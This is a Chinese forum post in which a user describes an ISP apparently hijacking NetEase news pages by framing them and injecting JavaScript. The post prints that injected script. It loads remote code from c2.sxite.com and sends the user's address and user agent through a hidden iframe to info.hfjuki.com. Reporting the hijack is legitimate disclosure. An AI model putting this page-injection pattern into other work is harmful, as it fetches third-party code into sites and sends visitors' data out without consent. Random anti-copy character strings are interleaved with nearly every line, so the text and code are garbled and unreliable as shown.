|
|
本帖最后由 hudba 于 2015-2-3 00:56 编辑 d5 e4 a M2 H2 L8 G3 ?
+ Z3 _+ z: s* T% i) y$ }上网易看新闻半天打不开,发现状态栏在现实访问一个奇怪的域名。心里一惊,难道电脑中毒了?赶紧查看源代码,发现后面加了一段js,真正的新闻内容给iframe了
* T8 G9 d1 `0 C' ~$ R: W+ b5 u: Z
接下来就是去搜索这个域名,得到v2ex里面也有人遇到这个问题,原来是运营商搞的鬼{:soso_e131:}
( I( c( b# V& A/ a8 Y rhttps://www.google.com/search?q=info.hfjuki.com&ie=utf-8&oe=utf-8 http://www.v2ex.com/t/142197
d6 Q# x( L; ]+ G8 P" S8 P; M4 l1 R; S. g& z3 t
顺便查下ip138:6 _7 p- a3 g3 ^( Q1 U
2 O) X% w7 |, W: r( q
这是那段js里面的代码,好象是个半成品还没写入广告数据:
: O9 O3 A; J) ^ x3 C. R% {( z. F- function locationSearch() {$ w) v9 w9 g6 J/ G" O1 |
- var s = getMainJs();
2 B' r% F, H( R% y5 p7 l7 x - if (s == null) {
& w' k7 N( {# d! j3 ?$ M! e) [. F0 M - location.reload();0 X' L# a6 s% A3 j5 |5 t- W0 d' ]
- }0 c7 [" q5 h7 _# Z, R! p& U
- return s.src.substring(s.src.indexOf(".js?") + 3, s.src.length);
. e: I% @# i* V' T' m3 h - }' H9 {1 v& r( l" d/ ]
- 7 }9 P3 K. x: M* M$ A, I+ A
- function getParameter(name, paraStr) {
& m! E' M0 [ ]0 Z6 s& l+ g - var result = "";& W8 J6 N" r" P3 ^4 U+ e9 L
- var str = "&" + paraStr.split("?")[1];2 O q7 ^/ S" `" c
- var paraName = "&" + name + "=";+ u2 J- l) A' Y2 J9 a; h* |5 Q" B
- if (str.indexOf(paraName) != -1) {) q9 o% E+ J8 K: H4 u- `
- if (str.substring(str.indexOf(name), str.length).indexOf("&") != -1) {
: w' `- D6 o# Q& U) d9 {+ p - var TmpStr = str.substring(str.indexOf(paraName), str.length);
2 ^0 A A/ Q$ ]6 n# E& [: G - result = TmpStr.substr(TmpStr.indexOf(paraName), TmpStr.substring(
: m+ R( h% ~) \' U+ i9 a - 1, TmpStr.length).indexOf("&")
( S# A( a- { ^6 k& ^; n, a - - TmpStr.indexOf(paraName) + 1);
! ^9 h. t r6 E3 |; K - } else {. r$ S, L8 {& Y8 r6 ?* o4 l3 v0 _
- result = str.substring(str.indexOf(paraName), str.length);8 D5 n3 f5 {* |/ V2 E9 v
- }$ J2 M4 f( T8 Z' C. Q2 s) b. ?0 _% v
5 o# s' y) A B- result = result.substring(result.indexOf("=") + 1, result.length);
% d: i$ i& x1 M' U2 Q - } else {6 s4 i- I: e7 y9 {* s$ K2 K4 z
- result = "No such parameter";$ Q( e9 E. K; ?8 Z( k+ p
- }; b! f$ Q& c2 a9 s5 I5 M
- return (result.replace("&", ""));
& g& ^3 a& g' w4 N' K( ~; v% K - }
5 e. ~* \+ n: |: G. p, _ - 1 S; ^( `3 [9 {; y. X) l) l
- function getMainJs() {
; N* u/ ]- E" |$ `% o - var scripts = document.getElementsByTagName("script");
, v$ E1 f4 b4 b8 g7 Z I$ T* } - var s = null;1 H6 I( z V' O/ q1 z
- for (var i = 0; i < scripts.length; i++) {, Q) k8 J; D/ \" v5 ~. \2 F* t* ?
- if (scripts[i] != "undefined" && scripts[i].src.indexOf("t_c") != -1) {; N) v# P) q: k
- s = scripts[i];) x7 u# M8 V n( q$ B
- break;& S g, O% o2 n2 J
- }
! r8 X' j! O2 ]: Z! D! t - }
7 g8 f+ _( [) N" x' k1 y - return s;
4 i7 x J. x2 S4 E# }) | - }
5 W* B0 r& C. B6 j. A V' O2 j2 `
2 B4 B' b# x2 u( \) ]- function appendParam(oStr, aStr) {. U* n8 H" G0 J! u9 B- r
- if (oStr.indexOf('?') > 0) {
! `8 K& r' D8 W - oStr = oStr + "&" + aStr;: o. j( K* k. H. [: S: b1 L) ^
- } else {
1 ?2 l2 b$ C4 h7 f - oStr = oStr + "?" + aStr;1 ~/ o$ @" E5 G' O) \/ f1 l
- }% S, r; G+ @1 G C
- return oStr;! u1 h/ \6 ^# i5 N
- }3 h" _5 @' H1 I0 L% l, J
1 f6 n- b+ v8 ?- |- window.onerror = function() {8 [! |% Q2 u6 P) |3 h
- };
# Q% I0 j$ C' e$ ?/ q - 2 c6 W6 v# [! z4 P
- var g_titleTime = 0;6 E- @8 Q9 s) R) V/ |
- function setTcTitle() {
) D' O# C* n9 a U: o* V9 _0 q0 P - if (undefined == document) {
8 ^( f Q) p' T% h" H, d4 m - g_titleTime++;
9 l; Z+ K4 ]: |) o7 C0 v# b - setTimeout("setTcTitle();", 1000);
9 n; l. x, f6 j9 x# ? - return;
4 K3 K4 x% D( p6 C& S. x - }
* s6 s+ N+ b+ P& [. k
; P) y1 K" M3 q2 T/ S- var doc;
3 X7 I, o7 N/ O: S: A$ F! Y& ] - try {
/ t+ s9 w6 p8 p' `$ k K8 Z4 q- f2 C, z# T - if (document.all) {8 q; d, q2 x& R* F/ p& B
- doc = document.frames["cn"].document;
- f* i# t! B) N - } else {8 v7 P$ b. z2 y6 F* l
- doc = document.getElementById("cn").contentDocument;
! Y) H; y' p) N; E- C. _ c! b* ` - }
+ E' z/ ?/ X. p$ ^( \ - } catch (ex) {1 v l1 W3 P. ] Y; F
- }$ F2 O2 T; f" A, H7 m' q! E* T
# O% k, @, r6 I9 n( N3 t6 `- if (g_titleTime < 5
- D" m# x7 E+ T$ ?) M - && (undefined == doc || undefined == doc.title || "" == doc.title)) {8 v7 ^9 X( {0 U* i- b2 I
- g_titleTime++;
+ f: n3 A' b( x8 e# M; ? - setTimeout("setTcTitle();", 1000);: u/ Q) O1 X/ D. s/ _0 b
- return;) P- p% O0 I2 G9 C
- } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
) v( t+ r% b6 \2 I& F$ ? - document.title = doc.title;& A1 o2 X+ K3 x! s
- setTcAdvVisible();
- ~) D3 [+ q4 g) R% E( S - }/ U9 |: {* I+ E1 q4 M1 ]6 h- V0 T
- }
! ?4 T8 w' _. x) j - 8 g0 S/ u4 t* ~$ @ ~! q
- setTimeout("setTcTitle();", 1000);
1 I5 H2 Q5 {1 D
l. T3 G; S7 `: T) h- var g_isHaveVisible = false;6 D; x. e' b4 W, b0 r7 {3 q7 ]
- function setTcAdvVisible() {0 F r0 Q; ~4 z2 K/ W
- if (undefined != document && undefined != document.getElementById("addiv")0 V2 R2 n+ E& z7 a( c
- && !g_isHaveVisible) {: t# c; a: G2 _7 h8 _. D
- document.getElementById("addiv").style.visibility = 'visible';
3 l; ]5 Z7 [2 T - document.getElementById("addiv").style.display = 'block';! B M1 E2 a+ N3 I" h
- g_isHaveVisible = true;
\' i& R2 F9 p* x - }
3 b# P% i5 d& c. @0 n* f1 N - }
7 ^. B. Z2 P' t8 _0 V. j
7 ~$ v* g8 u+ p9 A u1 e+ ]- function UrlAnalyzer() {- `! K/ V( b2 |) C5 R
- this.divda = "";. a, r6 F* `" `. h
- this.tctype = "";7 m- z1 |+ ?) S! D- k. j8 W' {
- this.radius = "";
/ z( q, }9 X3 c' _5 T) f" j8 x - this.rlu = "";
, b7 ~- K( k+ K - }
# w: Q4 |" W6 A, W Q
: P# l/ f9 \4 z& b' s- UrlAnalyzer.prototype.initParameters = function() {# d. O: O! z$ J/ \% k: y$ V
- var paraStr = locationSearch();
8 Q& H. G9 v! _) ?% M! u - this.rlu = getParameter("lruedct", paraStr);
8 ?; U7 X* v5 \, S: ]$ l - this.divda = getParameter("divda", paraStr);
/ B. a5 A8 p8 m" O1 K# w. r! a - this.radius = getParameter("radius", paraStr);
1 F. A4 w0 f" x$ p+ z2 Q - this.tctype = getParameter("tctype", paraStr);/ b" Z9 Y! B8 Z! J U7 @2 @) B3 e( l% I4 y
- this.address = getParameter("address", paraStr);
$ a0 T9 {4 A8 z7 J# t - this.usagent = getParameter("usagent", paraStr);$ u, }2 E# y4 z0 |2 D
- }
* M: \ m" Y f - 2 P6 K5 `: W' u! q! t: _
- UrlAnalyzer.prototype.getHtmlDoc = function() {, ?% g2 U7 A @
- var doc;
. ]) \/ ^+ [ J7 [ - try {1 c, R4 u5 T. t# T# p
- if (document.all) {
- o% z0 G2 C1 f* J3 a; d - doc = document.frames["cn"].document;
. [# Z2 }2 P3 ?: @' t8 F - $ Y3 T: q$ k, K% K( F1 V
- } else {* ]+ p! B' `1 U/ g+ f
- doc = document.getElementById("cn").contentDocument;2 {& F# @7 V ~$ P6 t
- // doc = document.getElementById("cn").contentWindow.document;, Z1 ~3 E6 n# D
- }% S$ c) _) d3 n$ q" X# b# U$ s9 D
- } catch (ex) {
- H3 @* E+ \: Y5 Q - }, W$ H& p5 N- O7 h$ } ~8 v& {
- return doc;3 f# c' f6 b/ C
- }8 r% N& O k0 k0 k: `
- % d8 H$ Z& p& H- e% G8 z- k
- UrlAnalyzer.prototype.setDomain = function() {) c% d+ Z m) s3 F/ Z. t* I' I
- if (undefined != document.title && "" == document.title)# s* p* ^* r* i) L
- {/ [ ]+ J, V7 [5 \8 F; x' }) q
- var index = document.domain.indexOf(".");
# x: l3 r5 W/ v5 v, j6 A' h - if (undefined != index && -1 != index) {) a+ Y# h$ x8 G4 K2 E# K, n0 w
- document.domain = document.domain.substring(index + 1,
: ^. s ^& n; Z3 D" z0 G - document.domain.length);
4 E& U" j, X! Q7 T( D/ P! x( c - }
) g$ D- U- c; [* o5 k -
& ` Z& [$ R$ ^ - var doc = this.getHtmlDoc();
6 c: P6 K+ b* D2 _$ g |# x( ~ - if (undefined != doc && undefined != doc.title && "" != doc.title) {4 {0 W5 _$ y4 ~. M2 Q
- document.title = doc.title;
9 G) O: J: U; A" j - setTcAdvVisible();: d" F, e+ r% |
- }% x! ^: T* d. g ?
- }
2 V" R2 X4 ]3 h - }9 N, v7 U: B; Z% [
# X- i8 v4 [3 x1 U/ W& }- UrlAnalyzer.prototype.iframeCallback = function() {
8 p! ~$ X( l* Q- ` - var doc = this.getHtmlDoc();6 Q/ z) g. i8 C9 w% K4 Z# V. s. B+ d
- if (undefined == doc || undefined == doc.title || "" == doc.title) {
9 }! r, F8 }9 R8 e" T2 }* M) Y+ U - if (undefined != document.domain) {
; w& _# T2 U6 ~$ W9 X8 d
: `1 \/ f, H) u; d3 k- var self = this;1 y) z* ~ \. j. `- Q: c
- setTimeout(function(){self.setDomain.call(self, null)}, 1000);
# t' q6 s! V5 m# M$ ]2 _! n - // var index = document.domain.indexOf(".");
+ D( A% j; r2 n$ X' B - // if (undefined != index && -1 != index) {
3 s n. I. f6 f. x' A - // document.domain = document.domain.substring(index + 1,
5 _0 h: z! \( Z& @: \& v2 { - // document.domain.length);" u- K$ G5 N2 Y
- // }- {. i7 i) z1 z8 z: C$ T8 y
- //
$ G" V$ b' s$ i, N - // var doc = this.getHtmlDoc();) e/ t- Z7 l f; {- z
- // if (undefined != doc && undefined != doc.title && "" !=6 P" @" [+ ~% E, o7 T1 u
- // doc.title) {
: b; w5 F9 n7 B: T1 _1 z8 F - // document.title = doc.title;# t1 o; v5 p- z K4 D3 j" {
- // setTcAdvVisible();
+ S# b& t) v! N$ f- ^, A, _ - // }2 o5 w- t6 l( x* A) F# U% m
- }
; @+ }4 M, ]) f9 v5 j - } else if (undefined != doc && undefined != doc.title && "" != doc.title) {0 p) m4 L/ H! W- f' Z
- document.title = doc.title;! ?: E/ \1 Y+ J7 K! c
- setTcAdvVisible();1 ], N3 y+ y7 l' l8 R. [- S
- }# G7 y2 B/ j: k/ n I0 j
- }
9 u7 t# E Z7 C1 A8 j+ `, P - 1 {) W0 k' q6 [* M4 N# c' i( H
- UrlAnalyzer.prototype.executeHtmlContext = function() {
) G! d3 w2 h! u$ R" v - var staUrl = "http://info.hfjuki.com:8060/page/statistics?advId=" + this.divda7 i6 U/ \% H3 l7 d3 v5 N
- + "&rd=" + this.radius + "&tctype=" + this.divda + "&address=" + this.address + "&usagent=" + this.usagent;
" M* d, W! r6 I6 X7 K1 C - / C4 W8 j t, Q! }6 C' K' P
- var htmlStr = "<iframe src="" + staUrl: F- i/ R* N8 C
- + "" style="display:none"></iframe>";
' c+ S: L1 [" I: a - ) N3 X) e$ S. c5 w
- var advUrl = htmlStr2 Y5 F0 j- I5 A8 M
- + "<script src="http://c2.sxite.com:8060/center?advId="
7 q; b( u& l" |! Z3 F- J3 ]$ ^ - + this.divda + "&radius=" + this.radius + "&area=1" + ""><\/script>";
: X5 {+ d& q( A7 {* H - document.write(advUrl); ]/ `, i1 T" n5 G( O5 `
# n" U ^ T/ K' G6 n/ g1 E- var self = this;
$ w0 S* _2 y/ s/ S. N7 Q - var iframe = document.getElementById("cn");
: V0 Q6 v- j5 A/ w( I4 Q/ F+ z - if (iframe.attachEvent) {" h: {' n2 _9 ]. s$ i: ]
- iframe.attachEvent("onload", function() {/ y; @" m$ r* S2 g7 z+ f$ e
- self.iframeCallback.call(self, null);1 G' `( Q, p, X8 l
- });/ _0 V/ g- |$ N* T' P
- } else {! V# t# x0 B) O0 H
- iframe.onload = function() {
' y! q8 G3 D& Z( \ - self.iframeCallback.call(self, null);/ E% f# J8 }' v( y! f6 _/ G
- }9 E9 r/ C' K+ l7 C
- }3 F1 p' @ ^# V1 q- i" e! v
- }
& M8 V+ D& ^% u2 q- e - - f0 B* C+ W$ i
- UrlAnalyzer.prototype.executeMain = function() {! F/ ~6 S. u) L; L3 I6 I
- var mainFrame = document.getElementById("cn");+ \1 n& ~ G9 l% N( D
- mainFrame.contentWindow.location.href = mainFrame.src;
J$ s6 e: O) x8 C, a F1 k/ ^ - this.initParameters();
& \8 A: l8 }9 c9 {# x& K; B - this.executeHtmlContext();
( Z. e1 x% G% n" U, U7 H% V - }0 c9 B9 N" o# g, V* H
$ y/ W: K& p" \! Z, Q- var g_analyzer = new UrlAnalyzer();, m5 X: J: f l6 M; E7 e
- g_analyzer.executeMain();5 T* i) i- o" [ |3 F/ w
6 B" x# N' P( h+ g8 w7 c: m f
/ z1 h8 }- l/ k0 C+ F |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?立即注册
x
|
发表于 2015-2-3 00:52:03
发表于 2015-2-3 04:58:09
发表于 2015-2-3 09:49:12
